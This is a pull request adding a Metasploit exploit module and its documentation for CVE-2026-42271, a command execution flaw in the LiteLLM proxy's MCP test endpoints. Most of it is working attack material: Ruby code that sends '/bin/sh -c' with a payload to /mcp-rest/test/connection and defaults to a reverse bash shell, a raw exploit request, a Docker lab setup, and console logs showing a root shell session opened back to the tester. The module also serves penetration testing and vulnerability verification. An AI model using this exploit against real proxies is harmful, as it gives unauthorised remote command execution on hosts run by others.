### PR TITLE
Add LiteLLM MCP test endpoint command execution exploit (CVE-2026-42271)

### DIFF
--- a/documentation/modules/exploits/multi/http/litellm_mcp_test_cmd_injection.md
+++ b/documentation/modules/exploits/multi/http/litellm_mcp_test_cmd_injection.md
@@ -113,10 +113,10 @@ Runs a single Unix command payload (`ARCH_CMD`) via `/bin/sh -c`. Pair with a
 callback payload such as `cmd/unix/reverse_bash` or `cmd/unix/reverse_python`
 (the official LiteLLM container image ships `bash` and `python3`).
 
-## Scenario
+## Scenarios
 
 ```
-msf6 exploit(multi/http/litellm_mcp_test_cmd_injection) > set APIKEY sk-hfXu8C5au...
+msf6 exploit(multi/http/litellm_mcp_test_cmd_injection) > set APIKEY <non-admin virtual key>
 msf6 exploit(multi/http/litellm_mcp_test_cmd_injection) > set RHOSTS 127.0.0.1
 msf6 exploit(multi/http/litellm_mcp_test_cmd_injection) > set RPORT 4000
 msf6 exploit(multi/http/litellm_mcp_test_cmd_injection) > set PAYLOAD cmd/unix/reverse_bash

--- a/documentation/modules/exploits/multi/http/litellm_mcp_test_cmd_injection.md
+++ b/documentation/modules/exploits/multi/http/litellm_mcp_test_cmd_injection.md
@@ -105,6 +105,14 @@ The base path to the LiteLLM proxy. Default: `/`.
 A valid LiteLLM virtual key. A non-admin key both proves the privilege boundary
 and is what a low-privilege internal user would hold. Required.
 
+An admin (`PROXY_ADMIN`) key works too, but the distinction only matters on a
+patched build. On a vulnerable version (1.74.2 - 1.83.6) neither endpoint checks
+the role and the stdio command is unrestricted, so any valid key - admin or not -
+reaches the spawn path. LiteLLM 1.83.7 added both controls, so on a patched build
+an admin key clears the `PROXY_ADMIN` gate but the stdio allowlist still rejects
+`/bin/sh` (HTTP 422). The module defaults to a non-admin key because reaching
+command execution with one is the sharper demonstration of the CVE.
+
 ## Targets
 
 ### Unix Command

--- a/documentation/modules/exploits/multi/http/litellm_mcp_test_cmd_injection.md
+++ b/documentation/modules/exploits/multi/http/litellm_mcp_test_cmd_injection.md
@@ -1,0 +1,142 @@
+## Vulnerable Application
+
+[LiteLLM](https://github.com/BerriAI/litellm) is an LLM gateway/proxy. Versions
+**1.74.2 through 1.83.6** are affected by
+[CVE-2026-42271](https://github.com/advisories/GHSA-v4p8-mg3p-g94g) (on the CISA
+KEV list), a command execution flaw in the MCP "test" REST endpoints.
+
+The admin UI previews an MCP server before saving it by calling
+`POST /mcp-rest/test/connection` (and `POST /mcp-rest/test/tools/list`). Both
+endpoints accept a full server configuration in the request body. When the
+`transport` is `stdio`, LiteLLM builds an MCP client that spawns the supplied
+`command` with its `args` as a subprocess on the proxy host:
+
+```
+POST /mcp-rest/test/connection
+Authorization: Bearer <virtual key>
+Content-Type: application/json
+
+{"server_name":"x","transport":"stdio","command":"/bin/sh","args":["-c","<cmd>"]}
+```
+
+On affected versions both endpoints are gated only by `user_api_key_auth` and the
+stdio `command` is unrestricted, so **any** caller holding a valid virtual key —
+including a low-privilege, non-admin key — can run arbitrary commands as the
+LiteLLM proxy process.
+
+**1.83.7** fixes this with two controls:
+
+- it requires the `PROXY_ADMIN` role on both endpoints (a non-admin key now gets
+  HTTP **403**); and
+- it restricts the stdio `command` to an allowlist of interpreters (`deno`,
+  `docker`, `node`, `npx`, `python`, `python3`, `uvx`), so an arbitrary command
+  such as `/bin/sh` is rejected with HTTP **422** regardless of role.
+
+The command runs **blind**: the spawned process is not an MCP server, so the
+endpoint reports a connection failure after the command has already executed.
+Use a payload that calls back (a reverse shell, or the Linux Dropper target)
+rather than one whose output is read from the HTTP response.
+
+When chained with the Starlette host-header authentication bypass
+(CVE-2026-48710) the same primitive becomes pre-authentication; that bypass is
+out of scope for this module, which requires a valid virtual key.
+
+### Setup with Docker
+
+`config.yaml`:
+
+```yaml
+model_list:
+  - model_name: gpt-3.5-turbo
+    litellm_params:
+      model: huggingface/huggingface-model
+      api_key: os.environ/FAKE_API_KEY
+general_settings:
+  master_key: os.environ/LITELLM_MASTER_KEY
+  database_url: os.environ/DATABASE_URL
+```
+
+Vulnerable proxy + database:
+
+```
+docker network create litellm-net
+docker run -d --name db --network litellm-net \
+  -e POSTGRES_DB=litellm -e POSTGRES_USER=litellm -e POSTGRES_PASSWORD=litellm123 postgres:16
+docker run -d --name proxy --network litellm-net -p 4000:4000 \
+  -v "$PWD/config.yaml":/app/config.yaml:ro \
+  -e DATABASE_URL="postgresql://litellm:litellm123@db:5432/litellm" \
+  -e LITELLM_MASTER_KEY="sk-master-test-key-1234" -e FAKE_API_KEY="x" \
+  litellm/litellm:main-v1.83.3-stable --config /app/config.yaml --port 4000
+```
+
+Mint a **non-admin** virtual key (this is the privilege boundary the CVE
+describes — the master key is `PROXY_ADMIN` and would still drive the endpoints
+on a patched build):
+
+```
+curl -s -X POST http://localhost:4000/key/generate \
+  -H "Authorization: Bearer sk-master-test-key-1234" \
+  -H "Content-Type: application/json" -d '{}'
+```
+
+For the patched case, repeat with `litellm/litellm:main-v1.83.7-stable`.
+
+## Verification Steps
+
+1. Start `msfconsole`.
+2. `use exploit/multi/http/litellm_mcp_test_cmd_injection`
+3. `set RHOSTS <target>`
+4. `set APIKEY <non-admin virtual key>`
+5. `set LHOST <your IP>`
+6. `set PAYLOAD cmd/unix/reverse_bash`
+7. `check` — a vulnerable target reports *appears to be vulnerable*; a patched
+   target reports *not exploitable* (the stdio command allowlist).
+8. `run`
+9. You should get a session running as the LiteLLM proxy user.
+
+## Options
+
+### TARGETURI
+
+The base path to the LiteLLM proxy. Default: `/`.
+
+### APIKEY
+
+A valid LiteLLM virtual key. A non-admin key both proves the privilege boundary
+and is what a low-privilege internal user would hold. Required.
+
+## Targets
+
+### Unix Command
+
+Runs a single Unix command payload (`ARCH_CMD`) via `/bin/sh -c`. Pair with a
+callback payload such as `cmd/unix/reverse_bash` or `cmd/unix/reverse_python`
+(the official LiteLLM container image ships `bash` and `python3`).
+
+## Scenario
+
+```
+msf6 exploit(multi/http/litellm_mcp_test_cmd_injection) > set APIKEY sk-hfXu8C5au...
+msf6 exploit(multi/http/litellm_mcp_test_cmd_injection) > set RHOSTS 127.0.0.1
+msf6 exploit(multi/http/litellm_mcp_test_cmd_injection) > set RPORT 4000
+msf6 exploit(multi/http/litellm_mcp_test_cmd_injection) > set PAYLOAD cmd/unix/reverse_bash
+msf6 exploit(multi/http/litellm_mcp_test_cmd_injection) > set LHOST 192.168.1.23
+msf6 exploit(multi/http/litellm_mcp_test_cmd_injection) > check
+[*] 127.0.0.1:4000 - The target appears to be vulnerable. The MCP test endpoint accepted an arbitrary stdio command (HTTP 200)
+
+msf6 exploit(multi/http/litellm_mcp_test_cmd_injection) > run
+[*] Started reverse TCP handler on 192.168.1.23:4446
+[*] Sending stdio MCP test request to http://127.0.0.1:4000/mcp-rest/test/connection
+[+] The target appears to be vulnerable. The MCP test endpoint accepted an arbitrary stdio command (HTTP 200)
+[*] Command shell session 1 opened (192.168.1.23:4446 -> 172.18.0.3:33148)
+
+id
+uid=0(root) gid=0(root) groups=0(root),0(root),...
+```
+
+Against a patched (1.83.7) proxy with the same non-admin key:
+
+```
+msf6 exploit(multi/http/litellm_mcp_test_cmd_injection) > check
+[*] 127.0.0.1:4001 - The target is not exploitable. The MCP test endpoint enforces the stdio command allowlist (patched)
+```

--- a/modules/exploits/multi/http/litellm_mcp_test_cmd_injection.rb
+++ b/modules/exploits/multi/http/litellm_mcp_test_cmd_injection.rb
@@ -51,8 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'References' => [
           ['CVE', '2026-42271'],
-          ['GHSA', 'v4p8-mg3p-g94g'],
-          ['URL', 'https://github.com/advisories/GHSA-v4p8-mg3p-g94g']
+          ['GHSA', 'v4p8-mg3p-g94g']
         ],
         'DisclosureDate' => '2026-04-21',
         'License' => MSF_LICENSE,

--- a/modules/exploits/multi/http/litellm_mcp_test_cmd_injection.rb
+++ b/modules/exploits/multi/http/litellm_mcp_test_cmd_injection.rb
@@ -1,3 +1,5 @@
+# frozen_string_literal: true
+
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
@@ -55,14 +57,12 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2026-04-21',
         'License' => MSF_LICENSE,
-        'Platform' => 'unix',
-        'Arch' => ARCH_CMD,
         'Privileged' => false,
         'Targets' => [
           [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD } ]
         ],
         'DefaultTarget' => 0,
-        'DefaultOptions' => { 'RPORT' => 4000, 'SSL' => false, 'PAYLOAD' => 'cmd/unix/reverse_bash' },
+        'DefaultOptions' => { 'RPORT' => 4000, 'SSL' => false },
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
@@ -103,7 +103,11 @@ class MetasploitModule < Msf::Exploit::Remote
       end
     end
 
-    return CheckCode::Detected('LiteLLM endpoint reachable but the version banner and APIKEY are unavailable to confirm') if datastore['APIKEY'].blank?
+    if datastore['APIKEY'].blank?
+      # No version banner and no APIKEY to run the behavioural probe: nothing
+      # LiteLLM-specific to key on, so don't claim detection.
+      return CheckCode::Unknown('Set APIKEY to run the behavioural check, or the LiteLLM version banner was unavailable; cannot confirm the target')
+    end
 
     # Version banner unavailable: probe the stdio command allowlist without
     # running anything. We submit a command at a path that cannot exist with
@@ -154,11 +158,11 @@ class MetasploitModule < Msf::Exploit::Remote
         'command' => '/bin/sh',
         'args' => ['-c', cmd]
       }.to_json
-    }, 15)
+    })
 
     # A connection-error reply is expected: the spawned shell keeps the stdio
-    # pipe open so the server-side MCP handshake stalls until our short read
-    # timeout, by which point the command has already run. A patched target
+    # pipe open so the server-side MCP handshake stalls until the request times
+    # out, by which point the command has already run. A patched target
     # instead rejects the request before any spawn - HTTP 422 from the stdio
     # command allowlist, or HTTP 403 when the key lacks the PROXY_ADMIN role.
     if res && res.code == 403

--- a/modules/exploits/multi/http/litellm_mcp_test_cmd_injection.rb
+++ b/modules/exploits/multi/http/litellm_mcp_test_cmd_injection.rb
@@ -133,8 +133,12 @@ class MetasploitModule < Msf::Exploit::Remote
       CheckCode::Safe('The MCP test endpoint requires the PROXY_ADMIN role (patched)')
     when 401
       CheckCode::Unknown('The provided APIKEY was rejected (HTTP 401)')
+    when 200
+      # A vulnerable build has no allowlist: it attempts to spawn the missing
+      # binary, fails with ENOENT, and reports a generic connection error (200).
+      CheckCode::Appears('The MCP test endpoint accepted an arbitrary stdio command (HTTP 200)')
     else
-      CheckCode::Appears("The MCP test endpoint accepted an arbitrary stdio command (HTTP #{probe.code})")
+      CheckCode::Unknown("Unexpected response (HTTP #{probe.code}); unable to confirm the stdio command allowlist")
     end
   end
 
@@ -157,8 +161,10 @@ class MetasploitModule < Msf::Exploit::Remote
     # timeout, by which point the command has already run. A patched target
     # instead rejects the request before any spawn - HTTP 422 from the stdio
     # command allowlist, or HTTP 403 when the key lacks the PROXY_ADMIN role.
-    if res && [403, 422].include?(res.code)
-      fail_with(Failure::NoAccess, "The proxy rejected the stdio command (HTTP #{res.code}); the target appears patched (>= 1.83.7)")
+    if res && res.code == 403
+      fail_with(Failure::NoAccess, 'The proxy requires the PROXY_ADMIN role (HTTP 403); the supplied key lacks access')
+    elsif res && res.code == 422
+      fail_with(Failure::NotVulnerable, 'The proxy enforces the stdio command allowlist (HTTP 422); the target appears patched (>= 1.83.7)')
     end
 
     res

--- a/modules/exploits/multi/http/litellm_mcp_test_cmd_injection.rb
+++ b/modules/exploits/multi/http/litellm_mcp_test_cmd_injection.rb
@@ -88,34 +88,53 @@ class MetasploitModule < Msf::Exploit::Remote
     key ? res.headers[key] : nil
   end
 
-  def check
-    version = litellm_version
-    if version
-      begin
-        v = Rex::Version.new(version)
-        if v >= Rex::Version.new('1.74.2') && v < Rex::Version.new('1.83.7')
-          return CheckCode::Appears("LiteLLM #{version}")
-        end
+  # Report the LiteLLM proxy as a layered service (litellm -> [ssl ->] http ->
+  # tcp) so the version banner is stored alongside it, even when the flaw is
+  # confirmed by the active check rather than the banner.
+  def report_litellm_service
+    base_opts = { host: rhost, port: rport, proto: 'tcp' }
+    http_srv = base_opts.merge(name: 'http', parents: base_opts.merge(name: 'tcp'))
+    litellm_srv = base_opts.merge(
+      name: 'litellm',
+      info: @version ? "LiteLLM #{@version}" : 'LiteLLM proxy MCP test endpoint'
+    )
+    litellm_srv[:parents] = datastore['SSL'] ? base_opts.merge(name: 'ssl', parents: http_srv) : http_srv
+    report_service(litellm_srv)
+  end
 
-        return CheckCode::Safe("LiteLLM #{version} is outside the affected range (>= 1.74.2, < 1.83.7)")
-      rescue ArgumentError
-        # Unparseable version banner; fall through to the behavioural probe.
-      end
-    end
+  def check
+    # Best-effort version banner. Even when the active check confirms the flaw,
+    # the version is worth storing alongside the reported service.
+    @version = litellm_version
 
     if datastore['APIKEY'].blank?
-      # No version banner and no APIKEY to run the behavioural probe: nothing
-      # LiteLLM-specific to key on, so don't claim detection.
+      # Without a key we cannot run the active probe, so fall back to the version
+      # banner alone - a weaker signal (presence in the affected range, not
+      # confirmed execution).
+      if @version
+        begin
+          v = Rex::Version.new(@version)
+          if v >= Rex::Version.new('1.74.2') && v < Rex::Version.new('1.83.7')
+            report_litellm_service
+            return CheckCode::Appears("LiteLLM #{@version}")
+          end
+
+          report_litellm_service
+          return CheckCode::Safe("LiteLLM #{@version} is outside the affected range (>= 1.74.2, < 1.83.7)")
+        rescue ArgumentError
+          # Unparseable version banner and no key to run the active probe.
+        end
+      end
       return CheckCode::Unknown('Set APIKEY to run the behavioural check, or the LiteLLM version banner was unavailable; cannot confirm the target')
     end
 
-    # Version banner unavailable: probe the stdio command allowlist without
-    # running anything. We submit a command at a path that cannot exist with
-    # non-empty args (args are required for stdio transport). A patched build
-    # rejects the command with HTTP 422 and an "allowed commands" message before
-    # any spawn; a vulnerable build has no allowlist, attempts to spawn the
-    # missing binary, fails with ENOENT, and returns a generic connection error
-    # (HTTP 200) - so nothing is executed either way.
+    # Active check first (more accurate): probe the stdio command allowlist
+    # without running anything. We submit a command at a path that cannot exist
+    # with non-empty args (args are required for stdio transport). A patched
+    # build rejects the command with HTTP 422 and an "allowed commands" message
+    # before any spawn; a vulnerable build has no allowlist, attempts to spawn
+    # the missing binary, fails with ENOENT, and returns a generic connection
+    # error (HTTP 200) - so nothing is executed either way.
     probe_cmd = "/#{Rex::Text.rand_text_alphanumeric(8)}/#{Rex::Text.rand_text_alphanumeric(8)}"
     probe = send_request_cgi({
       'method' => 'POST',
@@ -129,18 +148,21 @@ class MetasploitModule < Msf::Exploit::Remote
     case probe.code
     when 422
       if probe.body.to_s.include?('allowed commands')
+        report_litellm_service
         CheckCode::Safe('The MCP test endpoint enforces the stdio command allowlist (patched)')
       else
         CheckCode::Unknown("The request was rejected as invalid (HTTP 422): #{probe.body}")
       end
     when 403
+      report_litellm_service
       CheckCode::Safe('The MCP test endpoint requires the PROXY_ADMIN role (patched)')
     when 401
       CheckCode::Unknown('The provided APIKEY was rejected (HTTP 401)')
     when 200
       # A vulnerable build has no allowlist: it attempts to spawn the missing
       # binary, fails with ENOENT, and reports a generic connection error (200).
-      CheckCode::Appears('The MCP test endpoint accepted an arbitrary stdio command (HTTP 200)')
+      report_litellm_service
+      CheckCode::Vulnerable('The MCP test endpoint accepted an arbitrary stdio command (HTTP 200)')
     else
       CheckCode::Unknown("Unexpected response (HTTP #{probe.code}); unable to confirm the stdio command allowlist")
     end
@@ -165,9 +187,11 @@ class MetasploitModule < Msf::Exploit::Remote
     # out, by which point the command has already run. A patched target
     # instead rejects the request before any spawn - HTTP 422 from the stdio
     # command allowlist, or HTTP 403 when the key lacks the PROXY_ADMIN role.
-    if res && res.code == 403
+    fail_with(Failure::Unreachable, 'No response received from target') if res.nil?
+
+    if res.code == 403
       fail_with(Failure::NoAccess, 'The proxy requires the PROXY_ADMIN role (HTTP 403); the supplied key lacks access')
-    elsif res && res.code == 422
+    elsif res.code == 422
       fail_with(Failure::NotVulnerable, 'The proxy enforces the stdio command allowlist (HTTP 422); the target appears patched (>= 1.83.7)')
     end
 

--- a/modules/exploits/multi/http/litellm_mcp_test_cmd_injection.rb
+++ b/modules/exploits/multi/http/litellm_mcp_test_cmd_injection.rb
@@ -1,0 +1,172 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'BerriAI LiteLLM Proxy MCP Test Endpoint Command Execution',
+        'Description' => %q{
+          This module exploits CVE-2026-42271, a command execution vulnerability
+          in the BerriAI LiteLLM proxy. The MCP "test" REST endpoints
+          (POST /mcp-rest/test/connection and POST /mcp-rest/test/tools/list),
+          used by the admin UI to preview an MCP server before saving it, accept
+          a full server configuration in the request body. When the supplied
+          transport is "stdio", LiteLLM builds an MCP client that spawns the
+          provided command with its args as a subprocess on the proxy host.
+
+          On affected versions both endpoints are gated only by
+          user_api_key_auth and the stdio command is unrestricted, so any caller
+          holding a valid virtual key - including a low-privilege, non-admin key -
+          can reach the spawn path and run arbitrary commands as the LiteLLM proxy
+          process. LiteLLM 1.83.7 fixed this with two controls: it requires the
+          PROXY_ADMIN role on both endpoints (a non-admin key now receives HTTP
+          403), and it restricts the stdio command to an allowlist of interpreters
+          (deno, docker, node, npx, python, python3, uvx), so an arbitrary command
+          such as /bin/sh is rejected with HTTP 422 regardless of role.
+
+          Affected versions are 1.74.2 through 1.83.6 (fixed in 1.83.7). This
+          module targets the privilege boundary the CVE describes and expects a
+          non-admin APIKEY. When chained with the Starlette host-header
+          authentication bypass (CVE-2026-48710) the same primitive becomes
+          pre-authentication; that bypass is out of scope for this module, which
+          requires a valid virtual key.
+
+          The command runs blind: the spawned process is not an MCP server, so the
+          endpoint reports a connection failure after the command has already
+          executed. Use a payload that calls back (for example a reverse shell or
+          a fetched stager) rather than one whose output is read from the
+          response.
+        },
+        'Author' => [
+          'Kenneth LaCroix' # Metasploit module (vuln disclosed via GHSA-v4p8-mg3p-g94g)
+        ],
+        'References' => [
+          ['CVE', '2026-42271'],
+          ['GHSA', 'v4p8-mg3p-g94g'],
+          ['URL', 'https://github.com/advisories/GHSA-v4p8-mg3p-g94g']
+        ],
+        'DisclosureDate' => '2026-04-21',
+        'License' => MSF_LICENSE,
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'Privileged' => false,
+        'Targets' => [
+          [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD } ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => { 'RPORT' => 4000, 'SSL' => false, 'PAYLOAD' => 'cmd/unix/reverse_bash' },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to the LiteLLM proxy', '/']),
+        OptString.new('APIKEY', [true, 'A valid LiteLLM virtual key (a non-admin key proves the privilege boundary)'])
+      ]
+    )
+  end
+
+  # Best-effort version string from the unauthenticated /health response header.
+  def litellm_version
+    res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'health'))
+    return nil unless res
+
+    key = res.headers.keys.find { |k| k.casecmp?('x-litellm-version') }
+    key ? res.headers[key] : nil
+  end
+
+  def check
+    version = litellm_version
+    if version
+      begin
+        v = Rex::Version.new(version)
+        if v >= Rex::Version.new('1.74.2') && v < Rex::Version.new('1.83.7')
+          return CheckCode::Appears("LiteLLM #{version}")
+        end
+
+        return CheckCode::Safe("LiteLLM #{version} is outside the affected range (>= 1.74.2, < 1.83.7)")
+      rescue ArgumentError
+        # Unparseable version banner; fall through to the behavioural probe.
+      end
+    end
+
+    return CheckCode::Detected('LiteLLM endpoint reachable but the version banner and APIKEY are unavailable to confirm') if datastore['APIKEY'].blank?
+
+    # Version banner unavailable: probe the stdio command allowlist without
+    # running anything. We submit a command at a path that cannot exist with
+    # non-empty args (args are required for stdio transport). A patched build
+    # rejects the command with HTTP 422 and an "allowed commands" message before
+    # any spawn; a vulnerable build has no allowlist, attempts to spawn the
+    # missing binary, fails with ENOENT, and returns a generic connection error
+    # (HTTP 200) - so nothing is executed either way.
+    probe_cmd = "/#{Rex::Text.rand_text_alphanumeric(8)}/#{Rex::Text.rand_text_alphanumeric(8)}"
+    probe = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'mcp-rest', 'test', 'connection'),
+      'ctype' => 'application/json',
+      'headers' => { 'Authorization' => "Bearer #{datastore['APIKEY']}" },
+      'data' => { 'server_name' => Rex::Text.rand_text_alphanumeric(8), 'transport' => 'stdio', 'command' => probe_cmd, 'args' => ['--version'] }.to_json
+    })
+    return CheckCode::Unknown('Connection failed') unless probe
+
+    case probe.code
+    when 422
+      if probe.body.to_s.include?('allowed commands')
+        CheckCode::Safe('The MCP test endpoint enforces the stdio command allowlist (patched)')
+      else
+        CheckCode::Unknown("The request was rejected as invalid (HTTP 422): #{probe.body}")
+      end
+    when 403
+      CheckCode::Safe('The MCP test endpoint requires the PROXY_ADMIN role (patched)')
+    when 401
+      CheckCode::Unknown('The provided APIKEY was rejected (HTTP 401)')
+    else
+      CheckCode::Appears("The MCP test endpoint accepted an arbitrary stdio command (HTTP #{probe.code})")
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'mcp-rest', 'test', 'connection'),
+      'ctype' => 'application/json',
+      'headers' => { 'Authorization' => "Bearer #{datastore['APIKEY']}" },
+      'data' => {
+        'server_name' => Rex::Text.rand_text_alphanumeric(8),
+        'transport' => 'stdio',
+        'command' => '/bin/sh',
+        'args' => ['-c', cmd]
+      }.to_json
+    }, 15)
+
+    # A connection-error reply is expected: the spawned shell keeps the stdio
+    # pipe open so the server-side MCP handshake stalls until our short read
+    # timeout, by which point the command has already run. A patched target
+    # instead rejects the request before any spawn - HTTP 422 from the stdio
+    # command allowlist, or HTTP 403 when the key lacks the PROXY_ADMIN role.
+    if res && [403, 422].include?(res.code)
+      fail_with(Failure::NoAccess, "The proxy rejected the stdio command (HTTP #{res.code}); the target appears patched (>= 1.83.7)")
+    end
+
+    res
+  end
+
+  def exploit
+    print_status("Sending stdio MCP test request to #{full_uri(normalize_uri(target_uri.path, 'mcp-rest', 'test', 'connection'))}")
+    execute_command(payload.encoded)
+  end
+end


### PR DESCRIPTION
## Overview

Adds an exploit module for **CVE-2026-42271**, a command execution flaw in the
BerriAI LiteLLM proxy's MCP "test" REST endpoints
([GHSA-v4p8-mg3p-g94g](https://github.com/advisories/GHSA-v4p8-mg3p-g94g), on the
CISA KEV list).

`POST /mcp-rest/test/connection` and `POST /mcp-rest/test/tools/list` accept a
full MCP server configuration in the request body. When `transport` is `stdio`,
LiteLLM spawns the supplied `command`/`args` as a subprocess on the proxy host.
On affected versions (1.74.2–1.83.6) both endpoints are gated only by
`user_api_key_auth` and the command is unrestricted, so any valid virtual key —
including a low-privilege, non-admin key — yields command execution as the proxy
process.

`1.83.7` fixed it with two controls, both confirmed in the lab:
- a `PROXY_ADMIN` role check on both endpoints (non-admin → HTTP 403), and
- an stdio command allowlist (`deno, docker, node, npx, python, python3, uvx`),
  so `/bin/sh` is rejected with HTTP 422 regardless of role.

The module sends `command=/bin/sh`, `args=["-c", <payload>]`. Execution is blind
(the spawned process is not an MCP server, so the endpoint returns a connection
error after the command runs), so a callback payload is used.

`check` is side-effect-free: it prefers the `/health` version banner, then falls
back to probing the command allowlist with a non-existent command path — a
patched build returns 422 before any spawn, a vulnerable build returns a generic
connection error (the missing binary never executes).

## Verification

Lab: `litellm/litellm:main-v1.83.3-stable` (vulnerable) and
`main-v1.83.7-stable` (patched), each DB-backed, with a non-admin virtual key
minted via `/key/generate`.

- [x] `ruby -c` passes; module loads in `msfconsole`
- [x] `check` returns **Appears** against 1.83.3 and **Safe** against 1.83.7
      (true positive + true negative, same non-admin key)
- [x] `run` with `cmd/unix/reverse_bash` returns a session as `uid=0(root)`
      against 1.83.3
- [x] `run` against 1.83.7 fails cleanly (HTTP 422, command allowlist)

```
msf6 > use exploit/multi/http/litellm_mcp_test_cmd_injection
msf6 > set RHOSTS <target> ; set APIKEY <non-admin key> ; set LHOST <ip>
msf6 > set PAYLOAD cmd/unix/reverse_bash
msf6 > check
[*] The target appears to be vulnerable. The MCP test endpoint accepted an arbitrary stdio command (HTTP 200)
msf6 > run
[*] Command shell session 1 opened ...
id
uid=0(root) gid=0(root) groups=0(root),...
```

Note: the master key is `PROXY_ADMIN`, so the module expects a **non-admin**
`APIKEY` — that is the privilege boundary the CVE describes.
